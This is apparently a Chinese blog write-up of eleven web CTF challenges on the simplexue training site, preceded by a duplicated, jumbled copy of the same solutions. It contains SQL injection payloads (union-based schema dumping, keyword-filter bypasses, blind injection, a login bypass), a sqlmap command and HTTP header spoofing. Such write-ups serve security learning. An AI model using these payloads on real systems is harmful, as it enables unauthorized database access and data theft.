WEB CTF 西普学院
2015-11-26 11:49
330 查看
1.菊花
http://ctf1.simplexue.com/web/6/
提示:
Please make sure you have installed .net framework 9.9!
用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again
用户名和数据库名称:root@cuit-092a2b258a inject
提示:
You don't have permission to access /on this server.
Make sure you are in HongKong
用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent
You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
用burp拦截
修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language:en-gb
The key is:HTTpH34der
用burp拦截
得到JAVAscript
<script type="text/javascript">
document.oncontextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
function check(){
if(document.getElementById("txt").value==a){
return true;
}else{
alert("密码错误");
return false;
}
}
</script>
写C算出:
#include<stdio.h>
int main()
{
float a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
printf("%f",a);
return 0;
}
运算结果:424178.562500 输入:424178 弹出key=> @#$JSisagoodtool@#$
id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
id content k0y
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
查看http发现 Content-Row: MTQ0ODU0MzEyNA== 填入 MTQ0ODU0MzEyNA== =>KEY: #WWWnsf0cus_NET#
查看源代码:
输入admin 提示 You are not admin! 于是想到闭合: 输入=> ')or 1=1# 得到 Key: WW
4000
W_SIMPLEXUE_COM
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
http协议:
用burp拦截 加入 X-Forwarded-For: 1.1.1.1 伪造IP为: 1.1.1.1 => Key is http_client
这题是找后台:
输入admin 查看源代码提示 =>呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大
输入system =>KEY: "!!!WellDoneBrother!"
这题是盲注题
输入用户名:admin,密码随意,然后提交
提示:登录失败,错误的用户名和密码
然后这么玩:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
注:
ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)
得到数据库:test
然后替换dabases();得到所有数据
注:这题过滤了select,用selselectect替换
用sqlmap这么来:
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table
http://ctf1.simplexue.com/web/6/
提示:
Please make sure you have installed .net framework 9.9!
用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again
id=0/**/ununionion/**/seselectlect/**/1,user(),database()
用户名和数据库名称:root@cuit-092a2b258a inject
<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>simplexue: flag is SimCTF{xuectf}
2.Forbidden
http://ctf1.simplexue.com/basic/header/提示:
You don't have permission to access /on this server.
Make sure you are in HongKong
用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent
3.头有点大
http://ctf1.simplexue.com/web/1/index.asp?id=1 提示:You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
用burp拦截
修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language:en-gb
The key is:HTTpH34der
4.请输入密码
http://ctf1.simplexue.com/basic/js/index.asp用burp拦截
得到JAVAscript
<script type="text/javascript">
document.oncontextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
function check(){
if(document.getElementById("txt").value==a){
return true;
}else{
alert("密码错误");
return false;
}
}
</script>
写C算出:
#include<stdio.h>
int main()
{
float a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
printf("%f",a);
return 0;
}
运算结果:424178.562500 输入:424178 弹出key=> @#$JSisagoodtool@#$
5.这个看起来有点简单
http://ctf5.simplexue.com/8/index.php?id=1id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
id content k0y
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
6.猫抓老鼠
http://ctf1.simplexue.com/basic/catch/查看http发现 Content-Row: MTQ0ODU0MzEyNA== 填入 MTQ0ODU0MzEyNA== =>KEY: #WWWnsf0cus_NET#
7.程序员的问题
http://ctf1.simplexue.com/web/4/index.php查看源代码:
<?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("*******", "****", "****"); mysql_select_db("****") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select user from php where (user='$user') and (pw='$pass')"; $query = mysql_query($sql); if (!$query) { printf("Error: %s\n", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"]; if($row['user']=="admin") { echo "<p>Logged in! Key: *********** </p>"; } if($row['user'] != "admin") { echo("<p>You are not admin!</p>"); } } ?>
输入admin 提示 You are not admin! 于是想到闭合: 输入=> ')or 1=1# 得到 Key: WW
4000
W_SIMPLEXUE_COM
8.what a fuck!这是什么鬼东西?
http://ctf5.simplexue.com/DUTCTF/1.html 有点晕,想到js加密,于是copy下来加上<script> </script> 弹出 Ihatejs9.貌似有点难
http://ctf8.simplexue.com/phpaudit/<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
http协议:
用burp拦截 加入 X-Forwarded-For: 1.1.1.1 伪造IP为: 1.1.1.1 => Key is http_client
10.进来就给你想要的
http://ctf1.simplexue.com/web/1/index.asp?id=1这题是找后台:
输入admin 查看源代码提示 =>呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大
输入system =>KEY: "!!!WellDoneBrother!"
11.看起来有点难
http://ctf1.simplexue.com/basic/inject/这题是盲注题
输入用户名:admin,密码随意,然后提交
提示:登录失败,错误的用户名和密码
然后这么玩:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
注:
ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)
得到数据库:test
然后替换dabases();得到所有数据
注:这题过滤了select,用selselectect替换
用sqlmap这么来:
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table
相关文章推荐
- ListView中嵌套ListView显示异常
- 捕鱼2技巧功能简析
- D3中数据与DOM element绑定之data() enter() exit()浅析
- JS实现文本复制与剪切
- GridView加载数据时的动画效果
- 使用Highcharts结合PHP与Mysql生成饼状图
- 《读书笔记》系列2:TCP/IP详解
- ImageZipUtil
- csharp:百度翻译
- IIS部署FTP服务器步骤
- u3d 发布的程序 窗口位置的改变
- autotool 交叉编译
- 这个错误,每个ScrumMaster都犯过
- ios审核加急
- csharp:百度翻译
- 这个错误,每个ScrumMaster都犯过
- UITableVIew 编辑
- 数据分析写作——程序员的另外一种输出
- 提示框插件SweetAlert
- WebService基于SoapHeader的安全性保证